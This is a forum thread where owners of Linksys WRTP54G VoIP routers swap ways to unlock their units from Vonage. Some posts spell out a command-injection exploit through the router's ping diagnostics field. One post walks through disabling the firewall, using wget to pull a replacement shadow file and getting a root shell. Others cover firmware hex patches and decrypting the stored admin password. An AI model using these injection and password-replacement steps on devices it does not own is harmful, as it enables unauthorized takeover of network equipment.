WRTP54G Unlocked?

Discussion in 'Other Linksys Equipment' started by rfv3, Jul 18, 2005.

  1. KillaB

    KillaB Network Guru Member

  2. mazilo

    mazilo Network Guru Member

    Goto DSLR VoIP forum and do a search there to find out how to unlock your unit.
  3. rfv3

    rfv3 Network Guru Member


    I know I've been gone for a minute, but any guesses as to what a "WRTP54G-NA" might be? Check out the downloads on linksys.com and then select this model router. From there read the data sheet... compare the data sheet for this to other WRTP54G-?? models and you'll see that this one does not have any provider listed on it (page 2 lower right). Hmm.... if I didn't decide to try Vonage I'd be quick to try this out (for those who are wondering, Vonage sucks compared to Skype... at least with my crappy connection).

  4. rfv3

    rfv3 Network Guru Member

    ... As I was saying

    Yes, I know the router itself has been out for a while but it looks like Linksys just recently posted the firmware for download :)
  5. rfv3

    rfv3 Network Guru Member

    WRTP54G Pwn3d!

    Now the thread title is official :). I've ping hacked my router and replaced the firmware :D (this is actually two different things, don't get them confused)

    As always, use this information at your own risk.

    Ping Hack:
    Okay, so ping hack is freak'n easy. First, I'm pretty sure I tried this with the latest firmware, but if you need, here is a page to download various versions:

    Just go to the ping page and say you want to ping the following address: && ls

    Let the ping window refresh (about 5 seconds) and check the output. So, now you can run small commands from the browser (just substitute 'ls' for the command of choice (ps, etc).

    So, all is good you can pretty much own your box from here (use dropbear or wget telnetd a shell. BUT, IF YOU WANT TO OPEN PORTS, run this command: && etc/firewall_stop

    Now you can open any service on any port :)

    Okay, so now you own the box. (Finally). I honestly don't know enough about the configuration of dropbear to set it up so that I can ssh in, but I imagine you'd create a config file in the var folder and then launch dropbear with the option to load its config from there. Any takers on howto?

    FINALLY, the WRTP54-G is finally unlocked. The above lets you get in and access the prompt, but what if you want to actually use your own VOIP provider? Say bye bye to vonage and hello to new firmware :).

    New firmware:

    First, Grab the 3.1.17 firmware for the WRTP54G-NA from http://www.linksys.com and Tiny Hexer from http://www.mirkes.de .

    Second, change only the following (use the top header/left column as a guide):
              0001 0203 0405 0607 0809 0A0B 0C0D 0E0F
        0X10            4359 574C
    0X3B0000  23DE 53C4 1545 243C
    Third, upload new firmware at . (For more help see: http://wiki.openwrt.org/OpenWrtDocs/Hardware/Linksys/WRTP54G )

    Last, you may want to do a hard-reset (hold the reset button until the nvram clears). This should be optional, but it can't hurt.

    Note: Even though the new firmware isn't locked down to Vonage, it is locked down as far as SSH goes :( . The ping hack should work with this firmware as well, but to be honest I forget. If you want to switch back to the old firmware, you follow the same procedures, just load the old image. (you may have to set a SIP password on the SIP page and use it instead of the tivonpw password)

    Hopefully with some support at dd-wrt we can get the box truely open.

    It's been fun, and good luck with future hacking.


    PS: Sorry for typos, and bad spelling, its late and I'm having to use a web-cafe without a spell-checker.
  6. rmanaka

    rmanaka LI Guru Member

    Great post!

    The CRC bytes at the end seem to be the same as the original .img and not a new CRC based upon the CYWM->CYWL patch. My upload of the patched .img bails out with a BAD CRC error accordingly. :frown:

    Have you calculated good CRC values that should be patched or am I missing something?

    I'm hoping to get my unit registered on Voicepulse's Open Access plan...right now it won't register as the Caller ID Number field (using 1.00.62-NA) won't pass a letter (s123456789) that seems to be required for Voicepulse registration...s123456789 is actually my username at VP, but the registration process won't work in my 1.00.62-NA loaded Vonage WRTP54 unless there something in the Caller ID Number! I hope that this version of firmware fixes that problem and allows me to register Line 1 at Voicepulse.

  7. rmanaka

    rmanaka LI Guru Member

    A good CRC for rvf3's post...

    rcilink in the following post calculated a good CRC value for the Linksys 3.1.17 firmware... http://www.dslreports.com/forum/remark,15847480~days=9999~start=200

    the last four bytes should be: AB 3A 49 5D

    he also calculated a MD5 for the firmware after the patches: 611eb9063d2c9c8ff2e34826c1a376e2

    Thank you all. I now have an exVonage WRTP54G registered with Voicepulse!!!
  8. bombel

    bombel LI Guru Member

    hi there

    is there anyone who wants to write the "step by step guide how to unlock vonage only WRTP54G" for me ? :p

    maybe rmanka ?
  9. celiomartins

    celiomartins LI Guru Member

  10. humvee

    humvee LI Guru Member

    I have just brought a linksys WRTP54G-AU it has the unlocked AU/NZ Firmware. I would like to back it up. So I can post it here and other places for people who currently have a locked down version of the firmware And also so when I start playing around with my firmware I can get back to my current firmware. I know I have seen a way posted somewhere that did it from the cmd line but I cannot find it now. I am very familiar with routers and networking and windows but am relatively new to Linux so any guides would be great. I am also keen to try the likes of openWRT or similar. of If any one has run this on a WRTP54g it would be good to hear from you
  11. stryton

    stryton Guest

    Sorry, I'm new here, but after finding this website I joined. I have the WRTP54G with Vonage with firmware version 1.00.62.

    Is it possible to hack this? Also, are there any advantages to this?
  12. humvee

    humvee LI Guru Member

    There are different levels of 'hacking' routers I beleive some have been acheived acheived for this router (eg change sip provider) some have not (eg replace firmware with one that allows bettter QOS, VPN's increasing wireless power.

    The main reason for doing the first option is to be able to choose a SIP/VOIP provider other then vontage
  13. mazilo

    mazilo Network Guru Member

    To find out your answer, start reading all posts in this thread to find out, particularly articles posted after 6/2006.
  14. humvee

    humvee LI Guru Member

    New hidden page found I found this by changing end of url from wireless%2Fwireless_setup.html to SysInfo.htm on my router this gives an output of
    Vendor:LINKSYS Model Name:WRTP54G Firmware Version:3.1.17.ETSI, 20060704114526 #:000 Boot Version: CodePattern:CYWM CodeWorkspace:IMAGE_B Country:EU RF Status:Enable RF Firmware Version: RF SSID:XX -----Dynamic Information RF Mac Address:00:18:XX:XX:83:58 Device Mac Address:00:18:39:51:83:56 WAN Mac Address:00:18:XX:XX:83:57 Hardware Version:1.00.03 .


    Also the ping hack does NOT work on my router infact the entire ping section does not work
  15. rmanaka

    rmanaka LI Guru Member

    Same here...

    Same here...ping section does not work. My output is as follows:
    Vendor:LINKSYS Model Name:WRTP54G Firmware Version:3.1.17, 20060704120438 #:000 Boot Version: CodePattern:CYWL CodeWorkspace:IMAGE_A Country:NA RF Status:Disable RF Firmware Version:N/A RF SSID:xxxxxxx -----Dynamic Information RF Mac Address:00:13:XX:XX:XX:36 Device Mac Address:00:XX:XX:XX:F3:34 WAN Mac Address:00:13:XX:XX:XX:35 Hardware Version:1.00.03

    Interesting that the CodeWorkspaces are different!
  16. bombel

    bombel LI Guru Member

    ok, now unlocking wrtp54g (vonage only) is not a problem.
    i have had filmware 1.00.62

    cyt 3.5 (3.9 doesn't work) ( http://www.bargainshare.com/index.php?showtopic=87504&st=0 ) + modiffied firmware from http://celiom.googlepages.com/linksys

    quick instruction:
    0. download CYT3.5 and wrtp54g_fw_3.1.17_USmod.img from links above
    1. disable all firewalls
    2. log into as admin/admin , and don't close this window
    3. run CYT 3.5 software and hit '1'. wait a minute...
    4. go to "Administration -> firmware upgrade ", login as Admin/Admin (or Admin/ , i don't remember)
    5. load the modiffied firmware and go buy a beer ;)

    5 minutes and i have it unlocked :)

    i bought it on ebay for 39$+11$ . in Poland the version wrtp54g-eu costs about 560zl = 175$ (1$=3.20zl)
    the only one difference is in US software there are wifi channels 1-11 , but in eu version 1-13.

    thanks for all people who made it possible to unlock
  17. daiyan

    daiyan Guest

    Hi there, I am trying to unlock the WRTP54G, but I am not able to do so.
    Can we unlock earthlink version on WRTP54G?
  18. samir77

    samir77 Guest

    Hey bombel what kinda of power supply are u using? are you using the original 110 power adapter or international 110~240V AC power adapter?

    If you are using 240V power adapter can you provide details of the adapter i.e., manufacturer, where did u buy it and is it working fine with ur router etc...

    Thanks you.
  19. xtremcub

    xtremcub Guest

    Using CTY,TFTP,RC4 I have the decripted tiMAC.xml off my WRTP54G-VA which shows the Adminpw (XrYKelfxxx) along with the userpw (tivonpw)

    Went to the admin page to login as Admin with the Xr password and no dice.


    Have tried to update the firmware a couple of times with varying results, logging in with my admin and then opening another window to the update firmware page, using CTY and logging in as Admin/admin then trying to load new firmware, made it to 100% and then the page never refreshed and eventually timed out, i reset the router, currently the firmware is at 1.00.62 and the voice tab is still locked. Haven't tried pulling down and decripting the tiMAC.xml file again to see if the adminpw line has changed.
  20. mtennant

    mtennant Guest

    new wrtp54g firmware released



    Does anyone have the expertise to figure out the new CRC for this file so it can be loaded on a Vonage version of this router that has been unlocked and running 3.1.17?
  21. stangri

    stangri LI Guru Member

    Yes, I've modified the file per instructions on the dslreports forums and flashed my initially locked Vonage unit (was first flashed with 3.1.17US mod and then 3.1.22EU mod) and it seems to be working fine (for a few hours).
  22. Maxwell2000

    Maxwell2000 Guest

    I cannot unlock my RTP 300


    I am desperate and tried it all. Is there anybody else who did not manage to unlock its RTP 300? Or am I the only one. I am just wondering if there is a possibility that it cannot be unlocked or if there always is a way and I have not found it yet.

    Thank you for your help.
  23. OG1502

    OG1502 Guest

  24. eosirl

    eosirl Guest

    Sorry no help help, just to let you know that I am in the same boat, I have Vonage Firmare 5.01.04 and it is relatively new, so no passwords floating around. I tried Cyt to reset the passwords but it failed when it tried to do XML provisioning of the unit.

    So anyone out there who can help and want to help, we both would appreciate the help.

  25. jrebeiro

    jrebeiro Guest

    I'm in the same boat as well. 5.01.04 killed my router. It can no longer be connected to the internet. When it is connected the router constantly reboots. Vonage won't give me the password to get to the firmware page so I can downgrade. This should be illegal! I paid $169 for this stupid thing last year and they completely broke it, won't send me a new one, and want to send me some Motorola replacement.

    I don't want a Motorola I want my Linksys device back. And I want my phone service back. It's been a month!

    Anyone who can get me a password or who knows how to get CYT working I would greatly appreciate it!
  26. PingHack

    PingHack Guest


    I have problem with unlocking WRTP54G 1.00.62 (Vonage)
    CYT in any versions not working.
    I have ping access but i don't know what be able do with.

    I see etc\passwd & etc\shadow with Admin hash key but brutal force hacking is very timeconsuming.
    I can create file by "echo a > \var\t" but zero lengt file is created and string "a" is showed in box.

    While I haven't got Admin pass I can't create/modify files by SSH access. (dropbear working, it is switchable in web interface)

    I was stopped in rfv3 procedure step:
    "Okay, so now you own the box. (Finally)"

    Please, give mi hints.
  27. mnc1234

    mnc1234 Guest

    Newbie question

    I just bought the WRTP54G at Compusa. I wanted a Wireless-G device and the rep there said that this would be the same as a WRT54G which was $40 more. I have no interest in using it for VOIP.

    I hooked it up and it seems to work fine. However, I am concerned after reading this thread whether this router (and my home computers) can be accessed through the VOIP part that I don't use.

    Thanks for any help.
  28. pablito

    pablito Network Guru Member

    Unlocked WRTP for $40 at TigerDirect

    I just picked up a WRTP54G from Tiger Direct (Canada) for $37. They had about 100 of them in remanufactured boxes. Works a treat if you understand all the options. I set it up against my Asterisk server and it works. For $40 I can buy an armload and not worry about the silly Vonage crap and unlocking....

  29. UnaCoder

    UnaCoder Networkin' Nut Member

    Hey Kiddies,

    Props to Rob for finding the ping hack. That was the magic I was looking for. After a few hours of toiling away at the uber limited ping prompt, I finally figured out a way to change the Admin account password so that I could SSH into my WRTP54G.

    Since it's 4:15am, and I work in a few hours, I'm going to be brief. I hacked my wrtp54g from my macbook pro, using a handful of little utilities.

    First things first. I needed a new password for the Admin account. I figured password updating utilities on the router itself would be ... limited ... with out real console IO, so I generated my password hash from my laptop first, and created a drop-in replacement for the shadow file.

    I wrote a small C program on my mac to generate the password hash using the crypt library:

    $ cat crypt.c
    #include <string.h>
    #include <stdlib.h>
    #include <stdio.h>
    #include <unistd.h>

    int main(int argc, char **argv) {
    if (argc != 2) {
    printf ("Bailing...\n");
    exit (1);
    char *password = argv[1];
    char *buffer[1024];

    printf ("Hashing: %s\n", password);
    strncpy(buffer, crypt(password, "aa"), sizeof(buffer)-1);
    printf("Encrypted string: %s\n", buffer);


    then compiled it:
    $ gcc -o crypt crypt.c
    then created a hash:
    $ ./crypt blah
    Hashing: blah
    Encrypted string: aaa1LSHpEdWOI

    OK, now that we got that out of the way, we need to figure out a way to get this onto the router.

    There are probably more than one ways to do this, and I'm sure my method was the most painful possibly, but it was the first one I got to work.

    So, from the Administration -> Diagnostics -> Ping window, I first cleared the firewall rules (thanks rob!) && /etc/firewall_stop

    note: once you do this you'll notice your internet connection stops working (if you're using the router at the same time as making these changes). Balls! the firewall was also configured to handle the routing of your precious packets! (we'll fix it temporarily later).

    Next, I used the netcat program 'nc' on my laptop to simulate being an http server:

    $ sudo nc -l 80

    that will run netcat in tcp listen mode on port 80.

    THEN, during my arduous digging around in the filesystem of the router I discovered it was equipped with 'wget'. Thanks linksys! My IP on the local wlan network was, so I pointed wget at my laptop's ip and it made a connection to netcat! oh joy! However I discovered that most of the file system is read-only, and that you need to write to somewhere in /var. I also discovered that /etc/shadow is a mere symlink to /var/tmp/shadow, so i decided i would plop my replacement shadow file right there.

    Before I dive into how I did that, let's see what was in the original shadow file:


    Well now, there's a nicely hashed password set by linksys that would take around 200 years to crack, how about we just get rid of it instead?

    as you recall from earlier, my hashed password "blah" is "aaa1LSHpEdWOI", so let's' just substitute that in for the existing has. I did this in notepad and kept it by my terminal where netcat was running for easy pasting.

    new shadow file contents (soon to be):

    OK. So now for the FUN stuff. we have to trick wget into thinking that we are a real web server (while our noses are growing long). How do we do this? Well I happen to know a bit about the HTTP protocol, so this wasn't too tricky for me. If you want to learn the HTTP protocol, I suggest starting with WikiPedia, and then graduating to something more serious like that actual RFC, but for now I'll let you cheat.

    SO, in the PING console on my wrtp54g, I ran the following command: && wget -O /var/tmp/blah

    Once I hit the Ping! button, sure enough WGET connected to my eager netcat server.

    It looked something like this:

    $ sudo nc -l 80 ( <<< this was the command to start netcat)
    GET /blah HTTP/1.0 (<<< here is wget asking for /blah like above)
    User-Agent: Wget/1.9.1
    Accept: */*
    Connection: Keep-Alive

    So, now that wget is connected to netcat, and asking for our file, we need to send it back a response. Here is a mocked up HTTP/1.0 response that I simply pasted back to netcat:

    HTTP/1.0 200 OK


    Then I tapped Control+D to signal the end of the file, and wget saved my fake shadow file right where I need it.

    Next, I copied it over the existing shadow file as follows (from the ping window again): && cp /var/tmp/blah /var/tmp/shadow

    Then just to be certain that it worked, i cat'ted the file: && cat /var/tmp/shadow

    and SWEET, my new password hash was in place!

    I used the following SSH command to login:

    $ ssh -a -o "PreferredAuthentications password" -l Admin

    the extra stuff was to speed up the connection a bit, since trying agent forwarding or ssh key auth was taking like 5 minutes before i got a password prompt....

    After I logged in, i was greeted with a busybox root shell:

    $ ssh -a -o "PreferredAuthentications password" -l Admin
    Admin@'s password:

    BusyBox v0.61.pre (2007.02.15-01:05+0000) Built-in shell (ash)
    Enter 'help' for a list of built-in commands.

    # export PS1="owned# "


    Now let's get those packets flowing again by re-enabling iptables MASQUERADING:

    owned# iptables -t nat -A POSTROUTING -i eth0 -j MASQUERADE

    now my internets were back and I was able to write this post =D

    Next thing i need to figure out is how to make the shadow file persistent (ie, saved across reboots...) I'm sure there's a flash device in there somewhere I need to poke. I'll keep ya'll posted.

  30. UnaCoder

    UnaCoder Networkin' Nut Member

    Well he didn't quite give you enough to own the box, but he did show you that the window was unlocked... I just spend a few hours figuring this out and put instructions in my post:


    let me know if it doesn't make sense... it's a bit complicated
  31. [XP1]

    [XP1] Networkin' Nut Member

    If the Linksys WRTP54G and the D-Link VTA-VR are similar, then you can modify the "/etc/config.xml" adminpwd_crypt: "<adminpwd_crypt>AB/PLgjMdnCMg</adminpwd_crypt>"

    That's what I did to set the admin password on my D-Link VTA-VR.

    You will have to unpack the firmware, modify, and then repack it.
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice